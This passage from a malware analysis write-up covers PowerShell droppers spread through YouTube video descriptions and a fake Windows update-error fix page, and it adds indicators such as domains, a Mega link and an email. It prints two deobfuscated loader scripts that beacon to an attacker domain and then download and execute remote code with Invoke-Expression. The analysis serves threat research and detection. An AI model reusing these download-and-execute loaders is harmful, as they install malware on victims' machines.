> 000b69a0 04 00 00 00 00 00 00 00 b4 af 0b 80 01 79 61 74 |.............yat|
> 000b69b0 65 2e 61 73 70 00 ff ff 00 00 00 00 00 00 00 00 |e.asp...........|
46764c46764
< 000b6d70 19 00 06 00 02 00 11 00 20 00 00 00 00 00 00 00 |........ .......|
---
> 000b6d70 45 78 69 74 50 72 6f 63 65 73 73 00 00 00 00 00 |ExitProcess.....|
```
These two files, shipped alongside the DLL in the delivered `ENC.zip`, contain encrypted content.
Update #2
Just as the GREEN payload changed, ENC changed too (2024-06-22 09:21). The new archive consists of multiple legitimate files plus the `ImPackr.exe` executable, which is the one that gets called. According to VirusTotal, some of the DLL files show malicious behaviour. According to a tweet by CyberRaiju, this is the same final payload used in a ClearFake campaign, which runs on "thousands of compromised #WordPress websites".
Further research
I found another version (uploaded 2024-05-29 by @hocdehanh) where the code to execute was provided directly in the video description for copying. Its Base64-encoded part, however, differs significantly from the other samples:
```powershell
function Invoke-ObfuscatedPostRequest {
    $u = @('https', '://ghufal.answermedia.site', '/KB/po', 'st.php');
    $h = @{
        ('User' + '-Agent') = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/23.0.0.0 Safari/537.36'
    };
    $b = @{
        source_id = 'YOUTUBE'
    };
    $j = $b | ConvertTo-Json;
    try {
        Invoke-RestMethod -Uri ([String]::Join('', $u)) -Method Post -Body $j -ContentType 'application/json' -Headers $h
    } catch {}
}
function Invoke-ObfuscatedCode {
    $u = @('https', '://ghufal.answermedia.site', '/KB/CO', 'DD');
    $url = [String]::Join('', $u);
    $j3L2 = @{
        ('User' + '-Agent') = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/23.0.0.0 Safari/537.36'
    };
    $t9V8 = Invoke-WebRequest -Uri $url -UseBasicParsing -Headers $j3L2;
    $k7P4 = [System.Text.Encoding]::UTF8.GetString($t9V8.Content);
    $i5L6 = Invoke-Expression $k7P4;
    $null = $i5L6;
    Clear-Host
}
Invoke-ObfuscatedPostRequest;
Invoke-ObfuscatedCode;
```
Two details are worth noting: the first function is a telemetry beacon that POSTs `{"source_id":"YOUTUBE"}` to `/KB/post.php` before the code is fetched, telling the operator which lure converted, and both requests carry a hard-coded, anachronistic User-Agent (`Chrome/23.0.0.0`) that makes a usable network indicator. However, at the time of discovery, Stage 2 was no longer available, as the site had already been blocked by Cloudflare.
Another upload (2024-05-14 by @OnTrendd) linked in its description to a similarly named blog page (ontrendyt[.]com/2024/05/how-to-fix-0x80070643-while-updating.html), offering a solution as a downloadable PowerShell script behind a Mega.nz link (mega[.]nz/file/PzgVHKYK#R77mTJQKpJR3KiX2X6Nn_zY7oXOIdcUoBbgEatYproc). This script follows a structure similar to the known Stage 1 but differs significantly in its Base64-encoded payload:
```powershell
$g91F = 'https://rtattack.baqebei1.online/KB/CODD'
$v38K = @{
    'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'
}
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K
IEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))
clear-host;
```
Again, Stage 2 was no longer available at the time of discovery, as the site had already been blocked by Cloudflare; this one, however, has an email address attached to it: rajatayyabmehmood003[@]gmail.com